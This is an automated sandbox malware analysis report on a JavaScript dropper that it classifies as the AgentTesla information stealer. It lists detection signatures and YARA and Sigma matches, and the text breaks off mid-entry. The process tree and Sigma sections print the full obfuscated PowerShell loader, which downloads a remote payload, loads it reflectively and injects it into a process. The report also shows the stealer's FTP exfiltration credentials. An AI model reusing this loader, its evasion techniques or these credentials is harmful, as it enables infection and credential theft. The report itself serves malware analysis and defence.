Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
scan_374783.js

Overview

General Information

Sample name:scan_374783.js
Analysis ID:1528227
MD5:c6b0c8c717d6f6b0fc0747c349821280
SHA1:e7b0686c4eebc8285ae5a2eb2c70a602b451b0d6
SHA256:9eb68fe0683e79b88e4b37a2b038336192b516c5f975bf8636dc1565432bbdbc
Tags:jsuser-lowmal3
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Yara detected AgentTesla
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Command shell drops VBS files
Connects to a pastebin service (likely for C&C)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Creates autostart registry keys with suspicious values (likely registry only malware)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found URL in obfuscated visual basic script code
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 5368 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan_374783.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6688 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQgAnACsAJwAwADgAdQByAGwAIAA9ACAAQwAnACsAJwA3AEkAaAB0AHQAcABzADoALwAvAHIAYQAnACsAJwB3AC4AJwArACcAZwBpACcAKwAnAHQAaAB1ACcAKwAnAGIAdQAnACsAJwBzAGUAcgBjAG8AbgB0ACcAKwAnAGUAbgB0ACcAKwAnAC4AYwAnACsAJwBvAG0ALwBOACcAKwAnAG8ARABlAHQAZQBjAHQATwAnACsAJwBuAC8ATgBvAEQAZQAnACsAJwB0AGUAYwB0AE8AbgAvAHIAZQBmAHMAJwArACcALwBoACcAKwAnAGUAYQAnACsAJwBkACcAKwAnAHMAJwArACcALwAnACsAJwBtACcAKwAnAGEAaQBuAC8ARABlACcAKwAnAHQAYQBoAE4AbwAnACsAJwB0AGgALQBWACcAKwAnAC4AdAAnACsAJwB4AHQAQwAnACsAJwA3AEkAOwAgAEIAMAAnACsAJwA4AGIAYQBzACcAKwAnAGUANgA0AEMAJwArACcAbwAnACsAJwBuAHQAZQBuAHQAIAA9ACAAKABOAGUAdwAtAE8AYgBqACcAKwAnAGUAYwAnACsAJwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQAnACsAJwBiAEMAbABpAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwAnACsAJwBhAGQAJwArACcAUwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABCACcAKwAnADAAOAB1ACcAKwAnAHIAbAAnACsAJwApADsAIABCADAAJwArACcAOAAnACsAJwBiAGkAbgBhACcAKwAnAHIAJwArACcAeQAnACsAJwBDACcAKwAnAG8AbgB0ACcAKwAnAGUAbgB0ACAAPQAnACsAJwAgAFsAUwB5AHMAdAAnACsAJwBlAG0ALgBDAG8AbgB2AGUAJwArACcAcgB0AF0AOgA6ACcAKwAnAEYAcgAnACsAJwBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuACcAKwAnAGcAKAAnACsAJwBCADAAJwArACcAOABiAGEAJwArACcAcwBlADYANAAnACsAJwBDAG8AbgB0ACcAKwAnAGUAbgB0ACkAOwAgACcAKwAnAEIAMAA4AGEAcwBzAGUAbQBiAGwAeQAgACcAKwAnAD0AIABbAFIAZQBmAGwAJwArACcAZQBjACcAKwAnAHQAJwArACcAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATAAnACsAJwBvAGEAZAAoAEIAMAA4ACcAKwAnAGIAaQBuAGEAcgB5AEMAJwArACcAbwAnACsAJwBuAHQAZQBuACcAKwAnAHQAKQAnACsAJwA7ACAAWwBkAG4AbABpAGIAJwArACcALgBJACcAKwAnAE8ALgBIACcAKwAnAG8AbQAnACsAJwBlACcAKwAnAF0AOgA6AFYAQQAnACsAJwBJACgAJwArACcAcABRACcAKwAnAFUAOAA4ADQAZQAnACsAJwA4AGUAMABkADUAMgAnACsAJwBmADAALQAnACsAJwBlADUAYQAnACsAJwBiAC0AJwArACcAMQAnACsAJwAxADYANAAtADAAMABjADYAJwArACcALQBhAGEAYQAyAGYAZgA1AGUAJwArACcAPQAnACsAJwBuACcAKwAnAGUAJwArACcAawAnACsAJwBvAHQAJgBhAGkAZABlAG0APQB0AGwAYQA/AHQAeAAnACsAJwB0ACcAKwAnAC4ANAAyADAAMgAwADEANwAwAG4AaQBnACcAKwAnAGkAcgBvAHIAZQAnACsAJwBpAHYAYQB4AC8AbwAvAG0AbwAnACsAJwBjAC4AJwArACcAdABvAHAAcwBwAHAAYQAuADQAMgAwADIAcwAnACsAJwB0AHAAeQByACcAKwAnAGMAJwArACcALwBiAC8AMAB2ACcAKwAnAC8AbQBvAGMAJwArACcALgAnACsAJwBzAGkAcABhAGUAbABnACcAKwAnAG8AbwBnACcAKwAnAC4AZQAnACsAJwBnAGEAcgBvACcAKwAnAHQAJwArACcAcwBlAHMAYQBiACcAKwAnAGUAcgBpAGYAJwArACcALwAvADoAJwArACcAcwAnACsAJwBwAHQAJwArACcAdABoAHAAUQBVACwAJwArACcAIABwAFEAVQAxAHAAUQBVACwAJwArACcAIABwAFEAVQBDADoAVAAnACsAJwA0AHkAUAByAG8AZwByAGEAbQBEAGEAdABhACcAKwAnAFQANAAnACsAJwB5ACcAKwAnAHAAUQBVACwAIABwACcAKwAnAFEAVQBhACcAKwAnAGwAYwBhAHQAaQAnACsAJwBmAGEAcAAnACsAJwBRAFUALAAgAHAAUQBVAEEAZABkAEkAbgBQAHIAJwArACcAbwBjAGUAcwBzADMAJwArACcAMgAnACsAJwBwAFEAVQAsACAAcABRACcAKwAnAFUAcABRAFUALABwACcAKwAnAFEAVQAnACsAJwBwACcAKwAnAFEAVQApACcAKQAgACAALQBDAHIAZQBwAEwAYQBDAGUAIAAoAFsAQwBoAGEAUgBdADEAMQAyACsAWwBDAGgAYQBSAF0AOAAxACsAWwBDAGgAYQBSAF0AOAA1ACkALABbAEMAaABhAFIAXQAzADQAIAAgAC0AQwByAGUAcABMAGEAQwBlACAAIAAoAFsAQwBoAGEAUgBdADYANwArAFsAQwBoAGEAUgBdADUANQArAFsAQwBoAGEAUgBdADcAMwApACwAWwBDAGgAYQBSAF0AMwA5ACAAIAAtAFIAZQBQAGwAQQBjAGUAIAAgACgAWwBDAGgAYQBSAF0ANgA2ACsAWwBDAGgAYQBSAF0ANAA4ACsAWwBDAGgAYQBSAF0ANQA2ACkALABbAEMAaABhAFIAXQAzADYAIAAgAC0AUgBlAFAAbABBAGMAZQAgACAAKABbAEMAaABhAFIAXQA4ADQAKwBbAEMAaABhAFIAXQA1ADIAKwBbAEMAaABhAFIAXQAxADIAMQApACwAWwBDAGgAYQBSAF0AOQAyACkAfAAuACgAIAAoAFsAcwBUAFIAaQBuAEcAXQAkAFYAZQBSAEIAbwBTAGUAcAByAGUARgBlAHIARQBOAGMAZQApAFsAMQAsADMAXQArACcAWAAnAC0ASgBPAGkAbgAnACcAKQA=';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7176 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('B'+'08url = C'+'7Ihttps://ra'+'w.'+'gi'+'thu'+'bu'+'sercont'+'ent'+'.c'+'om/N'+'oDetectO'+'n/NoDe'+'tectOn/refs'+'/h'+'ea'+'d'+'s'+'/'+'m'+'ain/De'+'tahNo'+'th-V'+'.t'+'xtC'+'7I; B0'+'8bas'+'e64C'+'o'+'ntent = (New-Obj'+'ec'+'t System.Net.We'+'bClient).D'+'ownlo'+'ad'+'Str'+'i'+'ng(B'+'08u'+'rl'+'); B0'+'8'+'bina'+'r'+'y'+'C'+'ont'+'ent ='+' [Syst'+'em.Conve'+'rt]::'+'Fr'+'omBase64Strin'+'g('+'B0'+'8ba'+'se64'+'Cont'+'ent); '+'B08assembly '+'= [Refl'+'ec'+'t'+'ion.Assembly]::L'+'oad(B08'+'binaryC'+'o'+'nten'+'t)'+'; [dnlib'+'.I'+'O.H'+'om'+'e'+']::VA'+'I('+'pQ'+'U884e'+'8e0d52'+'f0-'+'e5a'+'b-'+'1'+'164-00c6'+'-aaa2ff5e'+'='+'n'+'e'+'k'+'ot&aidem=tla?tx'+'t'+'.42020170nig'+'irore'+'ivax/o/mo'+'c.'+'topsppa.4202s'+'tpyr'+'c'+'/b/0v'+'/moc'+'.'+'sipaelg'+'oog'+'.e'+'garo'+'t'+'sesab'+'erif'+'//:'+'s'+'pt'+'thpQU,'+' pQU1pQU,'+' pQUC:T'+'4yProgramData'+'T4'+'y'+'pQU, p'+'QUa'+'lcati'+'fap'+'QU, pQUAddInPr'+'ocess3'+'2'+'pQU, pQ'+'UpQU,p'+'QU'+'p'+'QU)') -CrepLaCe ([ChaR]112+[ChaR]81+[ChaR]85),[ChaR]34 -CrepLaCe ([ChaR]67+[ChaR]55+[ChaR]73),[ChaR]39 -RePlAce ([ChaR]66+[ChaR]48+[ChaR]56),[ChaR]36 -RePlAce ([ChaR]84+[ChaR]52+[ChaR]121),[ChaR]92)|.( ([sTRinG]$VeRBoSepreFerENce)[1,3]+'X'-JOin'')" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 7296 cmdline: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\alcatifa.vbs" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • AddInProcess32.exe (PID: 7360 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
  • wscript.exe (PID: 7596 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\alcatifa.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 7688 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\alcatifa.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.fosna.net", "Username": "sarthiever@fosna.net", "Password": "(=8fPSH$KO_!"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.2549002759.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    0000000E.00000002.2549002759.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      0000000E.00000002.2553669358.0000000002B05000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 5 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            11.2.powershell.exe.27d11278980.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              11.2.powershell.exe.27d11278980.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                11.2.powershell.exe.27d11278980.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                • 0x325c5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                • 0x32637:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                • 0x326c1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                • 0x32753:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                • 0x327bd:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                • 0x3282f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                • 0x328c5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                • 0x32955:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                11.2.powershell.exe.27d11278980.0.unpackMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
                • 0x2f78d:$s2: GetPrivateProfileString
                • 0x2ee5d:$s3: get_OSFullName
                • 0x304a3:$s5: remove_Key
                • 0x30693:$s5: remove_Key
                • 0x315ac:$s6: FtpWebRequest
                • 0x325a7:$s7: logins
                • 0x32b19:$s7: logins
                • 0x357fc:$s7: logins
                • 0x358dc:$s7: logins
                • 0x37231:$s7: logins
                • 0x36476:$s9: 1.85 (Hash, version 2, native byte-order)
                14.2.AddInProcess32.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  Click to see the 9 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Base64 Encoded PowerShell Command Detected
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQgAnACsAJwAwADgAdQByAGwAIAA9ACAAQwAnACsAJwA3AEkAaAB0AHQAcABzADoALwAvAHIAYQAnACsAJwB3AC4AJwArACcAZwBpACcAKwAnAHQAaAB1ACcAKwAnAGIAdQAnACsAJwBzAGUAcgBjAG8AbgB0ACcAKwAnAGUAbgB0ACcAKwAnAC4AYwAnACsAJwBvAG0ALwBOACcAKwAnAG8ARABlAHQAZQBjAHQATwAnACsAJwBuAC8ATgBvAEQAZQAnACsAJwB0AGUAYwB0AE8AbgAvAHIAZQBmAHMAJwArACcALwBoACcAKwAnAGUAYQAnACsAJwBkACcAKwAnAHMAJwArACcALwAnACsAJwBtACcAKwAnAGEAaQBuAC8ARABlACcAKwAnAHQAYQBoAE4AbwAnACsAJwB0AGgALQBWACcAKwAnAC4AdAAnACsAJwB4AHQAQwAnACsAJwA3AEkAOwAgAEIAMAAnACsAJwA4AGIAYQBzACcAKwAnAGUANgA0AEMAJwArACcAbwAnACsAJwBuAHQAZQBuAHQAIAA9ACAAKABOAGUAdwAtAE8AYgBqACcAKwAnAGUAYwAnACsAJwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQAnACsAJwBiAEMAbABpAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwAnACsAJwBhAGQAJwArACcAUwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABCACcAKwAnADAAOAB1ACcAKwAnAHIAbAAnACsAJwApADsAIABCADAAJwArACcAOAAnACsAJwBiAGkAbgBhACcAKwAnAHIAJwArACcAeQAnACsAJwBDACcAKwAnAG8AbgB0ACcAKwAnAGUAbgB0ACAAPQAnACsAJwAgAFsAUwB5AHMAdAAnACsAJwBlAG0ALgBDAG8AbgB2AGUAJwArACcAcgB0AF0AOgA6ACcAKwAnAEYAcgAnACsAJwBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuACcAKwAnAGcAKAAnACsAJwBCADAAJwArACcAOABiAGEAJwArACcAcwBlADYANAAnACsAJwBDAG8AbgB0ACcAKwAnAGUAbgB0ACkAOwAgACcAKwAnAEIAMAA4AGEAcwBzAGUAbQBiAGwAeQAgACcAKwAnAD0AIABbAFIAZQBmAGwAJwArACcAZQBjACcAKwAnAHQAJwArACcAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATAAnACsAJwBvAGEAZAAoAEIAMAA4ACcAKwAnAGIAaQBuAGEAcgB5AEMAJwArACcAbwAnACsAJwBuAHQAZQBuACcAKwAnAHQAKQAnACsAJwA7ACAAWwBkAG4AbABpAGIAJwArACcALgBJACcAKwAnAE8ALgBIACcAKwAnAG8AbQAnACsAJwBlACcAKwAnAF0AOgA6AFYAQQAnACsAJwBJACgAJwArACcAcABRACcAKwAnAFUAOAA4ADQAZQAnACsAJwA4AGUAMABkADUAMgAnACsAJwBmADAALQAnACsAJwBlADUAYQAnACsAJwBiAC0AJwArACcAMQAnACsAJwAxADYANAAtADAAMABjADYAJwArACcALQBhAGEAYQAyAGYAZgA1AGUAJwArACcAPQAnACsAJwBuACcAKwAnAGUAJwArACcAawAnACsAJwBvAHQAJgBhAGkAZABlAG0APQB0AGwAYQA/AHQAeAAnACsAJwB0ACcAKwAnAC4ANAAyADAAMgAwADEANwAwAG4AaQBnACcAKwAnAGkAcgBvAHIAZQAnACsAJwBpAHYAYQB4AC8AbwAvAG0AbwAnACsAJwBjAC4AJwArACcAdABvAHAAcwBwAHAAYQAuADQAMgAwADIAcwAnACsAJwB0AHAAeQByACcAKwAnAGMAJwArACcALwBiAC8AMAB2ACcAKwAnAC8AbQBvAGMAJwArACcALgAnACsAJwBzAGkAcABhAGUAbABnACcAKwAnAG8AbwBnACcAKwAnAC4AZQAnACsAJwBnAGEAcgBvACcAKwAnAHQAJwArACcAcwBlAHMAYQBiACcAKwAnAGUAcgBpAGYAJwArACcALwAvADoAJwArACcAcwAnACsAJwBwAHQAJwArACcAdABoAHAAUQBVACwAJwArACcAIABwAFEAVQAxAHAAUQBVACwAJwArACcAIABwAFEAVQBDADoAVAAnACsAJwA0AHkAUAByAG8AZwByAGEAbQBEAGEAdABhACcAKwAnAFQANAAnACsAJwB5ACcAKwAnAHAAUQBVACwAIABwACcAKwAnAFEAVQBhACcAKwAnAGwAYwBhAHQAaQAnACsAJwBmAGEAcAAnACsAJwBRAFUALAAgAHAAUQBVAEEAZABkAEkAbgBQAHIAJwArACcAbwBjAGUAcwBzADMAJwArACcAMgAnACsAJwBwAFEAVQAsACAAcABRACcAKwAnAFUAcABRAFUALABwACcAKwAnAFEAVQAnACsAJwBwACcAKwAnAFEAVQApACcAKQAgACAALQBDAHIAZQBwAEwAYQBDAGUAIAAoAFsAQwBoAGEAUgBdADEAMQAyACsAWwBDAGgAYQBSAF0AOAAxACsAWwBDAGgAYQBSAF0AOAA1ACkALABbAEMAaABhAFIAXQAzADQAIAAgAC0AQwByAGUAcABMAGEAQwBlACAAIAAoAFsAQwBoAGEAUgBdADYANwArAFsAQwBoAGEAUgBdADUANQArAFsAQwBoAGEAUgBdADcAMwApACwAWwBDAGgAYQBSAF0AMwA5ACAAIAAtAFIAZQBQAGwAQQBjAGUAIAAgACgAWwBDAGgAYQBSAF0ANgA2ACsAW
                  Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
                  Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('B'+'08url = C'+'7Ihttps://ra'+'w.'+'gi'+'thu'+'bu'+'sercont'+'ent'+'.c'+'om/N'+'oDetectO'+'n/NoDe'+'tectOn/refs'+'/h'+'ea'+'d'+'s'+'/'+'m'+'ain/De'+'tahNo'+'th-V'+'.t'+'xtC'+'7I; B0'+'8bas'+'e64C'+'o'+'ntent = (New-Obj'+'ec'+'t System.Net.We'+'bClient).D'+'ownlo'+'ad'+'Str'+'i'+'ng(B'+'08u'+'rl'+'); B0'+'8'+'bina'+'r'+'y'+'C'+'ont'+'ent ='+' [Syst'+'em.Conve'+'rt]::'+'Fr'+'omBase64Strin'+'g('+'B0'+'8ba'+'se64'+'Cont'+'ent); '+'B08assembly '+'= [Refl'+'ec'+'t'+'ion.Assembly]::L'+'oad(B08'+'binaryC'+'o'+'nten'+'t)'+'; [dnlib'+'.I'+'O.H'+'om'+'e'+']::VA'+'I('+'pQ'+'U884e'+'8e0d52'+'f0-'+'e5a'+'b-'+'1'+'164-00c6'+'-aaa2ff5e'+'='+'n'+'e'+'k'+'ot&aidem=tla?tx'+'t'+'.42020170nig'+'irore'+'ivax/o/mo'+'c.'+'topsppa.4202s'+'tpyr'+'c'+'/b/0v'+'/moc'+'.'+'sipaelg'+'oog'+'.e'+'garo'+'t'+'sesab'+'erif'+'//:'+'s'+'pt'+'thpQU,'+' pQU1pQU,'+' pQUC:T'+'4yProgramData'+'T4'+'y'+'pQU, p'+'QUa'+'lcati'+'fap'+'QU, pQUAddInPr'+'ocess3'+'2'+'pQU, pQ'+'UpQU,p'+'QU'+'p'+'QU)') -CrepLaCe ([ChaR]112+[ChaR]81+[ChaR]85),[ChaR]34 -CrepLaCe ([ChaR]67+[ChaR]55+[ChaR]73),[ChaR]39 -RePlAce ([ChaR]66+[ChaR]48+[ChaR]56),[ChaR]36 -RePlAce ([ChaR]84+[ChaR]52+[ChaR]121),[ChaR]92)|.( ([sTRinG]$VeRBoSepreFerENce)[1,3]+'X'-JOin'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('B'+'08url = C'+'7Ihttps://ra'+'w.'+'gi'+'thu'+'bu'+'sercont'+'ent'+'.c'+'om/N'+'oDetectO'+'n/NoDe'+'tectOn/refs'+'/h'+'ea'+'d'+'s'+'/'+'m'+'ain/De'+'tahNo'+'th-V'+'.t'+'xtC'+'7I; B0'+'8bas'+'e64C'+'o'+'ntent = (New-Obj'+'ec'+'t System.Net.We'+'bClient).D'+'ownlo'+'ad'+'Str'+'i'+'ng(B'+'08u'+'rl'+'); B0'+'8'+'bina'+'r'+'y'+'C'+'ont'+'ent ='+' [Syst'+'em.Conve'+'rt]::'+'Fr'+'omBase64Strin'+'g('+'B0'+'8ba'+'se64'+'Cont'+'ent); '+'B08assembly '+'= [Refl'+'ec'+'t'+'ion.Assembly]::L'+'oad(B08'+'binaryC'+'o'+'nten'+'t)'+'; [dnlib'+'.I'+'O.H'+'om'+'e'+']::VA'+'I('+'pQ'+'U884e'+'8e0d52'+'f0-'+'e5a'+'b-'+'1'+'164-00c6'+'-aaa2ff5e'+'='+'n'+'e'+'k'+'ot&aidem=tla?tx'+'t'+'.42020170nig'+'irore'+'ivax/o/mo'+'c.'+'topsppa.4202s'+'tpyr'+'c'+'/b/0v'+'/moc'+'.'+'sipaelg'+'oog'+'.e'+'garo'+'t'+'sesab'+'erif'+'//:'+'s'+'pt'+'thpQU,'+' pQU1pQU,'+' pQUC:T'+'4yProgramData'+'T4'+'y'+'pQU, p'+'QUa'+'lcati'+'fap'+'QU, pQUAddInPr'+'ocess3'+'2'+'pQU, pQ'+'UpQU,p'+'QU'+'p'+'QU)') -CrepLaCe ([ChaR]112+[ChaR]81+[ChaR]85),[ChaR]34 -CrepLaCe ([ChaR]67+[ChaR]55+[ChaR]73),[ChaR]39 -RePlAce ([ChaR]66+[ChaR]48+[ChaR]56),[ChaR]36 -RePlAce ([ChaR]84+[ChaR]52+[ChaR]121),[ChaR]92)|.( ([sTRinG]$VeRBoSepreFerENce)[1,3]+'X'-JOin'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\Sys
                  Sigma detected: Potential PowerShell Command Line Obfuscation
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('B'+'08url = C'+'7Ihttps://ra'+'w.'+'gi'+'thu'+'bu'+'sercont'+'ent'+'.c'+'om/N'+'oDetectO'+'n/NoDe'+'tectOn/refs'+'/h'+'ea'+'d'+'s'+'/'+'m'+'ain/De'+'tahNo'+'th-V'+'.t'+'xtC'+'7I; B0'+'8bas'+'e64C'+'o'+'ntent = (New-Obj'+'ec'+'t System.Net.We'+'bClient).D'+'ownlo'+'ad'+'Str'+'i'+'ng(B'+'08u'+'rl'+'); B0'+'8'+'bina'+'r'+'y'+'C'+'ont'+'ent ='+' [Syst'+'em.Conve'+'rt]::'+'Fr'+'omBase64Strin'+'g('+'B0'+'8ba'+'se64'+'Cont'+'ent); '+'B08assembly '+'= [Refl'+'ec'+'t'+'ion.Assembly]::L'+'oad(B08'+'binaryC'+'o'+'nten'+'t)'+'; [dnlib'+'.I'+'O.H'+'om'+'e'+']::VA'+'I('+'pQ'+'U884e'+'8e0d52'+'f0-'+'e5a'+'b-'+'1'+'164-00c6'+'-aaa2ff5e'+'='+'n'+'e'+'k'+'ot&aidem=tla?tx'+'t'+'.42020170nig'+'irore'+'ivax/o/mo'+'c.'+'topsppa.4202s'+'tpyr'+'c'+'/b/0v'+'/moc'+'.'+'sipaelg'+'oog'+'.e'+'garo'+'t'+'sesab'+'erif'+'//:'+'s'+'pt'+'thpQU,'+' pQU1pQU,'+' pQUC:T'+'4yProgramData'+'T4'+'y'+'pQU, p'+'QUa'+'lcati'+'fap'+'QU, pQUAddInPr'+'ocess3'+'2'+'pQU, pQ'+'UpQU,p'+'QU'+'p'+'QU)') -CrepLaCe ([ChaR]112+[ChaR]81+[ChaR]85),[ChaR]34 -CrepLaCe ([ChaR]67+[ChaR]55+[ChaR]73),[ChaR]39 -RePlAce ([ChaR]66+[ChaR]48+[ChaR]56),[ChaR]36 -RePlAce ([ChaR]84+[ChaR]52+[ChaR]121),[ChaR]92)|.( ([sTRinG]$VeRBoSepreFerENce)[1,3]+'X'-JOin'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('B'+'08url = C'+'7Ihttps://ra'+'w.'+'gi'+'thu'+'bu'+'sercont'+'ent'+'.c'+'om/N'+'oDetectO'+'n/NoDe'+'tectOn/refs'+'/h'+'ea'+'d'+'s'+'/'+'m'+'ain/De'+'tahNo'+'th-V'+'.t'+'xtC'+'7I; B0'+'8bas'+'e64C'+'o'+'ntent = (New-Obj'+'ec'+'t System.Net.We'+'bClient).D'+'ownlo'+'ad'+'Str'+'i'+'ng(B'+'08u'+'rl'+'); B0'+'8'+'bina'+'r'+'y'+'C'+'ont'+'ent ='+' [Syst'+'em.Conve'+'rt]::'+'Fr'+'omBase64Strin'+'g('+'B0'+'8ba'+'se64'+'Cont'+'ent); '+'B08assembly '+'= [Refl'+'ec'+'t'+'ion.Assembly]::L'+'oad(B08'+'binaryC'+'o'+'nten'+'t)'+'; 